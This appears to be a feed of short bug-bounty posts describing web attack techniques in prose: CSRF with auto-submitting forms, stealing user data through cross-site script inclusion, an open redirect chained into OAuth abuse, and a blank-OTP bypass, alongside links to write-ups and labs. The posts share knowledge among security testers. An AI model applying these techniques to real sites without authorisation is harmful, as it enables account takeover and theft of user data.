🧠 CSRF → Silent Action Execution 1️⃣ Victim is logged in 2️⃣ Attacker crafts hidden form auto-submitting to target site 3️⃣ Browser sends cookies automatically 4️⃣ Action (e.g. change email/password) executes without user intent 🎯 No token? No protection. #bugbounty #csrf

Hey Grok , based on your analysis of the last 365 days, list in sequence 10 accounts that frequently visit my profile. Do not mention the person, only @.username and the rate of visits to the profile per month

Yay, I was awarded a $2,500 bounty on HackerOne! hackerone.com/m4rc10sz Look for dynamically generated JS embedding sensitive user info in global scope. If session cookies go cross-site, you can load it via <script src> and exfil data - SOP doesn't apply to script inclusion

A simple open redirect can wreak havoc. Simple open redirect -> misconfigured OAuth authentication flow -> privilege abuse using Amazon Cognito token #bugbounty #bugcrowd

Day 13 ( Con't ) - Bug Bounty ( Going Solo ) - Discovered a broken authentication that lead to account takeover, this could be a low-medium because i have to meet a certain requirements to prove exploitability, which i was able to, that was what actually downgraded the CVSS.

Found a very simple yet weird OTP bypass issue recently: Tried a normal flow: - Wrong OTP → rejected (expected behavior) - Blank value in OTP param → surprisingly accepted, allowing me to change account details without the correct OTP. So the server was verifying OTPs, but

Want to hack mobile applications? 📱 We’ve just published the ultimate guide to building an Android #BugBounty lab with emulators, real devices and proxies (featuring Genymotion, Android emulator, Magisk, Burp, Frida & Medusa) 👇 #BugBountyTips yeswehack.com/learn-bug-boun…

🗃️ File Upload Validation Bypass: Breaking Down Multipart Parsers Blog: blog.sicuranext.com/breaking-down-… author: theMiddle

3rd Account Takeover finding for this month (after investing almost 2 months understanding the app without any finding). Allah's plan is always the best! Alhamdulillah. If you guys wanna be friends or just ask something, feel free to hit me up!

What screenshotting tools have you used, and which one is the best?

I Publish My Website and my first blog🔥 Website blackvirus.pages.dev Bug bounty Methodology Part 1 : blackvirus-blog.pages.dev/web-security-b… enjoy😁 #BugBounty #bugbountytips #Cybersecurity #Hacking

josephthacker.com/hacking/2025/0…

Authentication bypass on Uber's Single Sign-On via subdomain takeover arneswinnen.net/2017/06/authen…

Bug Bounty Lesson: Don’t treat a target as pages. Treat it as a collection of flows. Login → reset password → change email → delete account. Each step has params. Each param is a chance for bugs. Flows reveal more than single endpoints.

Attackers don’t always break the door down. Sometimes they just walk in and make themselves at home. 🏡 Broken authentication and weak session management let attackers impersonate real users without raising alarms. 🤨 Here’s what you need to know: bugcrowd.com/blog/when-atta…

What happened here? 1.I found a subdomain endpoint via DuckDuckGo dorking. 2.I noticed a login endpoint that’s different from the users endpoint (neither allows registration). 3.I fuzzed that endpoint and discovered a user-management endpoint, but the website redirected me, so I

I published a Bug Bounty Playbook to help the community quickly test bypasses and move past roadblocks. It includes OWASP Top 10 examples + extra vuln types. Techniques limited for now — more coming. Repo: github.com/ehpavan/Pavan-… #BugBounty #bugbountytips #Hacking #CyberSecurity

How I found my first 0-click Account Takeover bug. #bugbounty #appsec #hacking

🚨 Prompt engineering is officially outdated. Anthropic just released the real playbook for building AI agents that actually work. It’s a 30+ page deep dive called The Complete Guide to Building Skills for Claude and it quietly shifts the conversation from “prompt engineering”